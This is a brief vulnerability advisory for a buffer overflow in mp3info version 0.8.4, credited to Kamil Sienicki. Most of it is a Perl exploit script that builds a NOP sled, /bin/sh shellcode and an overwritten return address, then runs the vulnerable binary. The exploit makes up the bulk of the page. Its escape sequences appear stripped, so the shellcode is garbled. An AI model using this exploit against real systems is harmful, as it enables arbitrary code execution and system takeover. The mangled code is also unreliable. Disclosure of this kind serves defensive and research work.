‘mp3info Buffer Overflow’

Summary

MP3Info is a little utility used to read and modify the ID3 tags of MP3 files.’

Improper handling of user input allows attackers to execute arbitrary code using mp3info.’

Credit:

‘The information has been provided by Kamil Sienicki.’


Details

Vulnerable Systems:
 * mp3info version 0.8.4

Exploit:
 #!/usr/bin/perl
# mp3info Buffer Overflow Exploit
#                       by Kamil ‘K3’ Sienicki
# just for fun 😉
 
$shellcode = ‘xebx1fx5ex89x76x08x31xc0x88x46x07x89’.
             ‘x46x0cxb0x0bx89xf3x8dx4ex08x8dx56x0c’.
             ‘xcdx80x31xdbx89xd8x40xcdx80xe8xdcxff’.
             ‘xffxff/bin/sh’;

$len = 413;
$ret = 0xbffff660;
$nop = ‘x90’;
$offset = 465;

if (@ARGV == 1) {
        $offset = $ARGV[0];
}

for ($i = 0; $i < ($len – length($shellcode) – 100); $i++) {
        $buffer .= $nop;
}

$buffer .= $shellcode;

print(‘Address: 0x’, sprintf(‘%lx’,($ret + $offset)), ‘n’);

$new_ret = pack(‘l’, ($ret + $offset));

for ($i += length($shellcode); $i < $len; $i += 4) {
        $buffer .= $new_ret;
}

exec(‘/usr/bin/mp3info’, $buffer);

#EoF’

Categories: Exploits